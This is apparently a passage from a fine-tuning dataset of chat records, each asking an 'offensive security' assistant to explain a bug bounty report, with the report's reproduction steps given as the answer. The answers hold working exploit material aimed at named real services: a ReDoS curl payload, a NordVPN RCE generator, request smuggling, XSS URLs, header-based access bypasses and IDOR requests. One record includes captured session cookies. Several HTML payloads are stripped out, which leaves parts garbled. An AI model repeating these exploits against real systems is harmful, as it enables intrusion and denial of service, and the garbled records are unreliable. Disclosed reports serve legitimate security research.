\"AAA\", lang: \"en\") {\n _id\n weapon_id\n rarity\n collection{ _id name }\n collection_id \n \n }\n}\n```\n\nResponse:\n\n```\n{\n \"data\": {\n \"search\": [\n {\n \"_id\": \"sticker-baaa-ckstabber\",\n \"weapon_id\": null,\n \"rarity\": \"High Grade\",\n \"collection\": null,\n \"collection_id\": null\n },\n {\n \"_id\": \"sticker-ork-waaagh\",\n \"weapon_id\": null,\n \"rarity\": \"High Grade\",\n \"collection\": null,\n \"collection_id\": null\n }\n ]\n },\n \"extensions\": {\n \"tracing\": {\n \"version\": 1,\n \"startTime\": \"2020-10-07T02:07:55.251Z\",\n \"endTime\": \"2020-10-07T02:07:55.516Z\",\n \"duration\": 264270190,\n \"execution\": {\n \"resolvers\": [\n {\n \"path\": [\n \"search\"\n ],...[Resumed for convenience]\n ]\n }\n }\n }\n}\n```\n\nPay attention in this part of JSON response: \n\n```\n \"startTime\": \"2020-10-07T02:07:55.251Z\",\n \"endTime\": \"2020-10-07T02:07:55.516Z\",\n``` \n\n**It's about a instantaneously response time.**\n\nOk, now we're ready to play with this...\n\nYou can reveal the bug inserting \"\\u0000\" on \"q\" parameter, in order to display an error with part of the graph query.\n\n+ Payload A (see the error response):\n\n ```\nquery a { \n search(q: \"\\u0000)\", lang: \"en\") {\n _id\n weapon_id\n rarity\n collection{ _id name }\n collection_id \n }\n}\n ```\n\nResponse:\n\n```\n{\n \"errors\": [\n {\n \"message\": \"value (?=.*\\u0000) must not contain null bytes\",\n \"locations\": [\n {\n \"line\": 2,\n \"column\": 3\n }\n ],\n \"path\": [\n \"search\"\n ],\n \"extensions\": {\n \"code\": \"INTERNAL_SERVER_ERROR\"\n }\n }\n ],\n....[Resumed]\n ```\n\n+ Payload B (reveal that this parameter filter a value with a regex)\n\n```\nquery a { \n search(q: \"\\u0000)\", lang: \"en\") {\n _id\n weapon_id\n rarity\n collection{ _id name }\n collection_id \n }\n}\n\n```\n\n Response:\n\n ```\n{\n \"errors\": [\n {\n \"message\": \"Invalid regular expression: /(?=.*X))/: Unmatched ')'\",\n \"locations\": [\n {\n \"line\": 2,\n \"column\": 3\n }\n...[Resumed]\n\n```\n\n### Passos para Reproduzir\n1. Send a POST with the bomb payload: \n\n ````\n curl 'https://wiki.cs.money/graphql' \\ \n -H 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36' \\\n -H 'content-type: application/json' \\\n -H 'accept: */*' \\ \n --data-binary $'{\"query\":\"query a { \\\\n search(q: \\\\\"[a-zA-Z0-9]+\\\\\\\\\\\\\\\\s?)+$|^([a-zA-Z0-9.\\'\\\\\\\\\\\\\\\\w\\\\\\\\\\\\\\\\W]+\\\\\\\\\\\\\\\\s?)+$\\\\\\\\\\\\\\\\\\\\\", lang: \\\\\"en\\\\\") {\\\\n _id\\\\n weapon_id\\\\n rarity\\\\n collection{ _id name }\\\\n collection_id \\\\n \\\\n }\\\\n}\",\"variables\":null}' \\\n --compressed\n ```\n 1. Compare response times with a simple query \"AAA\" (explained above)\n\n### Impacto\nDenial of Service"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [@firebase/util] Prototype pollution"}, {"role": "assistant", "content": "### Passos para Reproduzir\n- install `@firebase/util` module:\n - `npm i ``@firebase/util`\n\nRun the following poc:\n```javascript\nconst utils = require('@firebase/util');\n\nconst obj = {};\nconst source = JSON.parse('{\"__proto__\":{\"polluted\":\"yes\"}}');\nconsole.log(\"Before : \" + obj.polluted);\nutils.deepExtend({}, source);\n// utils.deepCopy(source);\nconsole.log(\"After : \" + obj.polluted);\n\n```\nOutput:\n```console\n\nBefore : undefined\nAfter : yes\n```\n{F1024346}\n\n### Impacto\nThe impact depends on the application. In some cases it is possible to achieve Denial of service (DoS), Remote Code Execution, Property Injection."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Possible RCE through Windows Custom Protocol on Windows client"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThe NordVPN windows client application registered two custom protocols **NordVPN:** and **NordVPN.Notification:** for process communication. This makes us are able to communicate with NordVPN.exe from web browser.\nAfter looking the executable binary, I noticed the class **NordVpn.Views.ToastNotifications.ListenNotificationOpenUrl** eventually calls function **Process.Start** with controllable argument, and this notification can be triggered through custom protocol **NordVPN.Notification:**. \nSo it's possible to execute arbitrary system command from web browser.\n\n### Passos para Reproduzir\n1. Create the malicious URL, the below is my script to generate the URL, it requires importing \"Newtonsoft.Json.dll\" and \"NordVpn.Core.dll\".\n\n ```csharp\n // Program.cs\n using System;\n using System.Collections.Generic;\n using NordVpn.Core.Tools;\n using NordVpn.Core.Models.ToastNotifications.Notifications;\n using System.Diagnostics;\n\n namespace ExploitApp\n {\n class Program\n {\n static void Main(string[] args)\n {\n Dictionary arguments = new Dictionary();\n arguments[\"OpenUrl\"] = \"calc.exe\";\n NotificationActionArgs toastArgs = new NotificationActionArgs(\"\", arguments);\n String exploit = ObjectCompressor.CompressObject(toastArgs);\n Console.Write(String.Format(\"NordVPN.Notification:{0}\", exploit));\n Console.ReadKey();\n }\n }\n }\n ```\n\n 2. Add the URL into a html file with iframe tag, then serves it on HTTP server.\n\n ```html\n \n \n \n \n \n \n Exploit\n \n \n \n \n \n ```\n\n 3. Open the html file in the browser. Modern web browser may popup a window to confirm to open NordVPN.exe, if we choose \"Open NordVPN\", the command will be executed and popup a calc.exe.\n\n### Impacto\nPossible to execute system command on victim's computer and take control of the computer."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Potential HTTP Request Smuggling in nodejs"}, {"role": "assistant", "content": "### Passos para Reproduzir\nfor example, using haproxy to make TE-TE attack:\n\nhaproxy 1.5.3 version haproxy.cfg\nhaproxy.cfg forbid access `/flag` URI\n```\nglobal\n daemon\n maxconn 256\n\ndefaults\n mode http\n timeout connect 5000ms\n timeout client 50000ms\n timeout server 50000ms\n\nfrontend http-in\n bind *:80\n default_backend servers\n acl url_403 path_beg -i /flag\n http-request deny if url_403\n\nbackend servers\n server server1 127.0.0.1:8080 maxconn 32\n```\n\napp.js\n```\nvar express = require('express');\nvar app = express();\nvar bodyParser = require('body-parser')\n\napp.use(bodyParser())\n\napp.get('/', function (req, res) {\n res.send('Hello World!');\n});\n\napp.get('/flag', function (req, res) {\n res.send('flag is 1a2b3c4d5e6f');\n});\n\napp.post('/', function (req, res) {\n res.send('Hello World!');\n});\n\napp.listen(8080, function () {\n console.log('Example app listening on port 8080!');\n});\n```\n\nuse this http request can bypass haproxy `/flag` restrict\n```\nPOST / HTTP/1.1\nHost: 127.0.0.1\nTransfer-Encoding: chunked\nTransfer-Encoding: chunked-false\n\n1\nA\n0\n\nGET /flag HTTP/1.1\nHost: 127.0.0.1\nfoo: x\n\n\n```\n\n### Impacto\n: \nIt is possible to smuggle the request and disrupt the user experience."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Send Empty CSRF leads to log out user on [https://hosted.weblate.org/accounts/profile]"}, {"role": "assistant", "content": "### Passos para Reproduzir\n1- Login to your account via [Login page](https://hosted.weblate.org/accounts/login/)\n2- Click on CSRF.html that attached. \nAfter that, you will redirect to a new page an see the error, the user after clicking on this file log out from account.\n\nYou can see in the CSRF file there isn't any token, but if you place a vaid CSRF token from the source page, this attack will be successful too.\n\n{F1029164}\n\nIf you have any questions, please let me know.\n\nBest.\n\n### Impacto\nAn attacker can send the CSRF file to the victim or host it on a website. Whenever the user login in to your website click on file or link will be logged out."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: CVE-2020-14179 on https://jira.theendlessweb.com/secure/QueryComponent!Default.jspa leads to information disclosure"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nthe Jira instance on jira.theendlessweb.com is vulnerable to CVE-2020-14179 which allows remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability\n\n{F1029731}\n\n### Passos para Reproduzir\nNavigate to https://jira.theendlessweb.com/secure/QueryComponent!Default.jspa\n\n### Impacto\nAffected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. The affected versions are before version 8.5.8, and from version 8.6.0 before 8.11.1."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [api.tumblr.com] Denial of Service by cookies manipulation"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nI have found at api.tumblr.com two parameters ```consumer_key ``` && ```consumer_secret``` allow to modify ```oa-consumer_key``` && ```oa_consumer_secret``` cookies values and property.\n\nAn attacker can send a malicious link to reset the cookies of api.tumblr.com, this lead to DOS.\nTo trigger the DOS, the target/victim account need to click a malicious link.\n\nTo restore the account, the victim need to delete all cookies on api.tumblr.com.\n\nSimilar issues : https://hackerone.com/reports/583819\n\n### Passos para Reproduzir\n1. Login at https://www.tumblr.com/\n\n2. Go to https://www.tumblr.com/oauth/apps and create a random application\n\n/!\\ if the cookies \"oa-consumer_key\" && \"oa_consumer_secret\" already exist the attack doesn't work /!\\\n\n3. After, create your application, click to this malicious following link \n```\nhttps://api.tumblr.com/console/auth?consumer_key=x;%20domain=tumblr.com;%20Max-Age=1000000000000000000000&consumer_secret=x;%20domain=tumblr.com;%20Max-Age=1000000000000000000000\n```\n\n4. Go back to https://www.tumblr.com/oauth/apps and try to connect to api.tumblr.com by clicking in \"Explore API\".\nYou will be redirected to https://www.tumblr.com/oauth/authorize?oauth_token=*&source=console and click to authorize\n\n5. loggout and login at tumblr.com\n\n6. Try again to connect to your application\n\nYou can follow me in the video POC.\n\nThanks, good bye.\n\n### Impacto\nDenial of Service and cookies manipulation"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Able to comment/view in others support ticket at https://en.instagram-brand.com/requests/dashboard"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nI reported the vulnerability to Facebook, and they have said to report it here for the bounty.\n\n### Passos para Reproduzir\n1. Create two account User A, User B at https://en.instagram-brand.com/\n2. Apply for Instagram brand from https://en.instagram-brand.com/requests/dashboard by User A\n3. Login to user B and intercept the request\n\n4.Send a post request with cookie and other header got by intercepting user B in the below endpoint and replace comment 44799 with User A support ticket id \nPOST /wp-json/brc/v1/approval-requests/44799/comments HTTP/1.1\ntext=sure thanks&files=1597287925578-44741-%3Etest.jpg&sizes=4249\n\n### Impacto\n1) can comment in other's support ticket\n2) can view other's support ticket comments (Both Instagram as well as user's)"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Blind XSS on image upload"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\n- The CSRF vulnerability make a request for support.cs.money/upload_file; This upload_file does not have csrf token/ origin/ reference verification!\n- The XSS allows to execute JS. The payload of the XSS stay in the param 'filename' of the CSRF request.\n\n### Passos para Reproduzir\nXSS\n- use a proxy like burp suite and turn intercept on\n- upload a file to the support chat\n- change the filename to \\\">\n\n \n\n \n\n \n\n
\n\n \n\n \n\n
\n\n \n\n\n```\n3) Go to https://www.tumblr.com/settings/account and you will see the keyword ```pwd777``` in your filtered content .\n\n/!\\ You can't add a same filtered content this will generate a 400 HTTP Response code /!\\\n\nYou can follow me in the video POC.\n\nThanks, good bye.\n\n### Impacto\nAllow a attacker add filtered content to a target/victim account."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: X-Forward-For Header allows to bypass access restrictions"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nIf the \"X-Forward-For: 127.0.0.1\" header is used, it allows to bypass restrictions of the web application and access endpoints that are restricted otherwise. This allows for example to access the \"Business Owner App backend API\". The responding server thinks, he is accessed by an internal IP.\n\n### Passos para Reproduzir\nPOC1:\n```\n➜ /tmp curl -k https://biz-app.yelp.com/status \n\n{\"error\": {\"id\": \"PredicateMismatch\"}}% \n➜ /tmp curl -k https://biz-app.yelp.com/status -H \"X-Forwarded-For: 127.0.0.1\"\n\n{\"host\": \"biz--app-main--useast1-74dd77b89b-fgtdk\", \"health\": {}, \"mem_vsz\": 1111.61328125, \"mem_rss\": 410.0, \"pid\": 91941, \"uptime\": 178784.86051034927, \"version\": null}\n```\n\nPOC2:\n```\n➜ /tmp curl -k https://biz-app.yelp.com/swagger.json \n{\"error\": {\"id\": \"HTTPNotFound\"}}% \n➜ /tmp curl -k https://biz-app.yelp.com/swagger.json -H \"X-Forwarded-For: 127.0.0.1\" \n█████\n█████\n███████\n█████████\n████\n███\n████\n██████\n█████████ \n██████████ [...]\n```\n\nThe responding server thinks, it is accessed by an internal IP as can be seen in the headers:\n```\nHTTP/1.1 200 OK\nConnection: close\nserver: openresty/1.13.6.2\ncontent-type: application/json\nx-b3-sampled: 0\nx-is-internal-ip-address: true\nx-zipkin-id: 2fce61c10ade1e32\nx-routing-service: routing-main--useast1-d84b86b87-cwstn; site=biz_app\nx-mode: ro\nx-proxied: 10-65-64-83-useast1aprod\nx-extlb: 10-65-64-83-useast1aprod\nAccept-Ranges: bytes\nDate: Mon, 19 Oct 2020 12:21:19 GMT\nVia: 1.1 varnish\nX-Served-By: cache-hhn4033-HHN\nX-Cache: MISS\nX-Cache-Hits: 0\nContent-Length: 573093\n```\n\n### Impacto\nAs the attacker is seen as having an internal IP he is able to access resources which should otherwise be restricted for him."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Reflected XSS at https://www.glassdoor.co.in/FAQ/Microsoft-Question-FAQ200086-E1651.htm?countryRedirect=true via PATH"}, {"role": "assistant", "content": "### Passos para Reproduzir\n1. Navigate to https://www.glassdoor.co.in/FAQ/Microsoft-Question-FAQ200086-E1651.htm?countryRedirect=true\n 2. input the payload inside path.\n\n 3.Open this url: https://www.glassdoor.co.in/FAQ/Mic%22%3e%3cimg%20onerro%3d%3e%3cimg%20src%3dx%20onerror%3dalert%601%60%3e\nrosoft-Question-FAQ200086-E1651.htm?countryRedirect=true\n\n An alert will be popped up.\n\n### Impacto\nUsing XSS an attacker can steals the victim cookie and can also redirect him to a malicious site controlled by the attacker."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: CSRF to account takeover in https://█████/"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThere is no protection against CSRF in changing email which lead to CSRF to account takeover on https://██████/.\n\n### Impacto\nIt is a critical issue as i was able to takeover anyone account using this attack. This vulnerability is high/critical because I was able to perform account takeover"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Subdomains takeover of register.acronis.com, promo.acronis.com, info.acronis.com and promosandbox.acronis.com"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThe Subdomains https://register.acronis.com, https://promo.acronis.com, https://info.acronis.com and https://promosandbox.acronis.com \nare vulnerable to takeover due to unclaimed marketo CNAME records. Anyone is able to own these subdomains at the moment.\n\nThis vulnerability is called subdomain takeover. You can read more about it here:\n\n https://blog.sweepatic.com/subdomain-takeover-principles/\n https://hackerone.com/reports/32825\n https://hackerone.com/reports/779442\t\n https://hackerone.com/reports/175070\n\n### Passos para Reproduzir\n```\nnslookup register.acronis.com\nNon-authoritative answer:\nName: sjh.mktossl.com\nAddresses:104.17.74.206\n 104.17.72.206\n 104.17.70.206\n 104.17.73.206\n 104.17.71.206\nAliases: register.acronis.com\n acronis.mktoweb.com\n\nnslookup promo.acronis.com\nNon-authoritative answer:\nName: sjh.mktossl.com\nAddresses: 104.17.71.206\n 104.17.70.206\n 104.17.74.206\n 104.17.72.206\n 104.17.73.206\nAliases: promo.acronis.com\n acronis.mktoweb.com\n\n```\n\nCNAMES entries to corresponding domains are as:\n```\npromo.acronis.com acronis.mktoweb.com\npromosandbox.acronis.com acronissandbox2.mktoweb.com\nregister.acronis.com acronis.mktoweb.com\ninfo.acronis.com \t mkto-h0084.com\n```\n\nAs register.acronis.com and promo.acronis.com pointing to CNAME record as acronis.mktoweb.com and are aliases to acronis.mktoweb.com . http://acronis.mktoweb.com/ is giving 404, page not found with message \"The requested URL was not found on this server\" which can be claimed by anyone now and would result in subdomain takeover.\n\nThe marketo document to Customize Your Landing Page URLs with a CNAME\nhttps://docs.marketo.com/display/public/DOCS/Customize+Your+Landing+Page+URLs+with+a+CNAME\n\n**As marketo is a paid service and offers account for marketing automation, I don't have a registered account. \nI wrote to Marketo technical support team and they claim the availability of listed domains as the listed domains are not in use or configured anymore.**\n\n### Impacto\nWith this, I can clearly see XSS impact in your case. Please have a look at your /v2/account request intercepted below:\nRequest:\n```\nPUT /v2/account HTTP/1.1\nHost: account.acronis.com\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/json;charset=utf-8\nContent-Length: 702\nOrigin: https://register.acronis.com\nConnection: close\nReferer: https://account.acronis.com/\nCookie: _gcl_au=1.1.36144172.1601449011; _ga=GA1.2.1290766356.1601449012; _fbp=fb.1.1601449012432.633797135; _hjid=a7dd36be-ea53-40b1-b04e-c2a96f5ebc3c; optimizelyEndUserId=oeu1601449014822r0.42778295429069313; OptanonConsent=isIABGlobal=false&datestamp=Mon+Oct+26+2020+16%3A35%3A28+GMT%2B0530+(India+Standard+Time)&version=6.6.0&hosts=&consentId=07081eac-3ae3-443d-8451-79f5327d9351&interactionCount=1&landingPath=NotLandingPage&groups=C0001%3A1%2CC0004%3A1%2CC0003%3A1%2CC0002%3A1&AwaitingReconsent=false&geolocation=IN%3BHR; _mkto_trk=id:929-HVV-335&token:_mch-acronis.com-1601449020651-40834; OptanonAlertBoxClosed=2020-10-26T11:05:28.204Z; visid_incap_1638029=Bol4fqOiQTKxMXB55rfSHvSPlF8AAAAAQUIPAAAAAACe+MbhqMW1sJI4dpZBH6DI; _hjTLDTest=1; nlbi_1638029=ibxAVmtdEHzy/Y9u+BxnEAAAAAB308NLs7A3ARoQwyk4Cyrg; incap_ses_745_1638029=ddKxJtFthhy2IeNut8VWCvWPlF8AAAAACuwA/vpt+9dXQmj6hoxBWQ==; _gid=GA1.2.639811834.1603690260; _gac_UA-149943-47=1.1603691724.Cj0KCQjwxNT8BRD9ARIsAJ8S5xZC0_Hlxu0wgG7xA0-jU5eIi2BxoGFsRealW_kNcbHRyB_H8h3z-y0aAjFAEALw_wcB; AcronisSID.en=8a4d91ace2ecadca23dda91cdcb5abc5; AcronisUID.en=1438137573; _hjAbsoluteSessionInProgress=1; _uetsid=6d516b50174c11eb8ef2b18637bee740; _uetvid=b490e7509541648c67826dc18a0c7c46; _gat_UA-149943-47=1\n```\n\nResponse:\n```\nHTTP/1.1 200 OK\nServer: nginx\nDate: Mon, 26 Oct 2020 11:59:18 GMT\nContent-Type: application/json\nConnection: close\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\npragma: no-cache\nexpires: -1\nX-RateLimit-Limit: 100\nX-RateLimit-Remaining: 97\nAccess-Control-Allow-Origin: https://register.acronis.com\nAccess-Control-Allow-Credentials: true\nAccess-Control-Allow-Headers: Accept, Accept-Encoding, Accept-Language, Authorization, Cache-Control, Connection, DNT, Keep-Alive, If-Modified-Since, Origin, Save-Data, User-Agent, X-Requested-With, Content-Type\nAccess-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS\np3p: CP=IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\nX-Frame-Options: SAMEORIGIN\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload\nX-XSS-Protection: 1; mode=block\nContent-Length: 714\n```\nSee in response below,:\n```\nAccess-Control-Allow-Origin: https://register.acronis.com\nAccess-Control-Allow-Credentials: true\n```\nAccess-Control-Allow-Credentials are true for Access-Control-Allow-Origin as *.acronis.com which makes Credentials true for all subdomains of acronis.com. Cross-Origin Resource Sharing (CORS) allows cross-domain access from all subdomains of acronis.com\n\nTherefore, by taking over listed subdomains or finding any XSS vulnerability in any of the listed subdomains can steal user information or read arbitrary data from the accounts of other users. \n\nThe Subdomain takeover allows various attacks.\n\n Malware distribution\n Phishing / Spear phishing\n XSS\n Authentication bypass\n ...\n\nList goes on and on. Since some certificate authorities (Let's Encrypt) require only domain verification, SSL certificate can be easily generated.\nAn attacker can utilize these domains for targeting the organization by fake login forms, or steal sensitive information of teams (credentials, information, etc)\n\nFIX & MITIGATION\n**You should immediately remove the CNAME entries for these domains or point it elsewhere if you don't use marketo services.**\n\nPlease let me know if more info needed or any help.\n\nBest Regards,\nAshmek"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Attacker can generate cancelled transctions in a user's transaction history using only Steam ID"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThe API endpoint `/create-payment` requires only the steam ID of the account to create the payment. When this endpoint is called using the `cardpay` flow, it returns a transaction ID on the Cardpay system. The attacker can access this transaction, and immediately cancel it (or pay it ;) ), which leads to a visible cancelled transaction in the cs.money user's transaction history.\n\nAlthough there is no impact to the user, they will certainly be confused.\n\n### Passos para Reproduzir\nInvoke the API call `/create-payment` as below:\n\n```\nPOST https://cs.money/create-payment HTTP/1.1\nHost: cs.money\nContent-Type: application/json;charset=UTF-8\nCookie: steamid=████████; \n\n{\"merchant\":\"cardpay\",\"amount\":10}\n```\n\nYou will get a response with a Cardpay order ID and URL:\n```\nHTTP/1.1 200 OK\n...\n{\"merchant\":\"cardpay\",\"orderId\":2034944,\"success\":true,\"url\":\"https://cardpay.com/MI/payment.html?uuid=DaG438Bda6GC13h5db1bGD01\"}\n```\n\nYou can then cancel the payment by hitting the Cardpay cancel URL:\n```\nhttps://cardpay.com/MI/cancel.html?uuid=DaG438Bda6GC13h5db1bGD01\n```\n\nThis will result in a cancelled transaction showing in the user's transaction history of the amount specified by the attacker. The attacker could repeat this numerous times until the account is banned by cs.money (this occurred on one of my test accounts).\n\n### Impacto\nConfusion for the user due to the ability to create many cancelled transactions, potentially leading to the account being banned."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [Information Disclosure] Amazon S3 Bucket of Shopify Ping (iOS) have public access of other users image"}, {"role": "assistant", "content": "### Passos para Reproduzir\n1. Install Shopify Ping on your phone then enable Shopify Chat for your store.\n2. Go to your Shopify Store and start chatting as a customer. ███\n3. Log in to Staff account on Shopify Ping and click on send image ████████\n4. Back to Shopify Store as Customer and inspect the website code, you will find the URL of image ██████████ https://ping-api-production.s3.us-west-2.amazonaws.com/oks██████\n5. Now visit https://ping-api-production.s3.us-west-2.amazonaws.com, you can view all images of other stores. █████████\n\n### Impacto\nUsing this Bucket access, a hacker can steal all private images of other stores and the user who shared through Shopify Ping."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: password field autocomplete enabled"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\n[Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications that employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.\nThe stored credentials can be captured by an attacker who gains control over the user's computer. Further, an attacker who finds a separate application vulnerability such as cross-site scripting may be able to exploit this to retrieve a user's browser-stored credentials.]\n\n### Passos para Reproduzir\n[follow the steps]\n\n 1. [signup with the new details]\n 1. [go to login page]\n 1. [there we will see password details are automatically filled]\n\n### Impacto\nThis autocomplete password can be sniffed without user permission"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Brave Browser potentially logs the last time a Tor window was used"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nA vulnerability in the Brave Browser allows an attacker to view the last time a Tor session was used in incognito mode. A local, on-disk attacker could read the Brave Browser's \"Local State\" json file and identify the last time a Tor session was used, affecting the confidentiality of a user's Tor session.\n\nFor example, the \"Local State\" file of a user who has recently used a Tor session would list a key value pair with a timestamp as accurate as \"13248493693576042\". This allows an attacker to fingerprint, or prove beyond reasonable doubt, that a user was using Tor at that very specific moment in time.\n\n### Passos para Reproduzir\nStart a Tor session in Brave Browser\n\n### Impacto\nViolate the confidentiality of a user's Tor session."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Default behavior of Fastifys versioned routes can be used for cache poisoning when Fastify is used in combination with a http cache / CDN"}, {"role": "assistant", "content": "### Passos para Reproduzir\nGiven the following Fastify server:\n\n```js\nconst app = require('fastify')();\n\napp.get('/', async () => {\n return { hello: 'world' };\n});\n\nconst start = async () => {\n await app.listen(9000)\n}\nstart();\n```\n\nRequesting this as follow:\n\n```sh\ncurl -v http://localhost:9000\n```\n\nit outputs a HTTP 200 with the expected content:\n\n```sh\n* Trying 127.0.0.1:9000...\n* TCP_NODELAY set\n* Connected to localhost (127.0.0.1) port 9000 (#0)\n> GET / HTTP/1.1\n> Host: localhost:9000\n> User-Agent: curl/7.68.0\n> Accept: */*\n> \n* Mark bundle as not supporting multiuse\n< HTTP/1.1 200 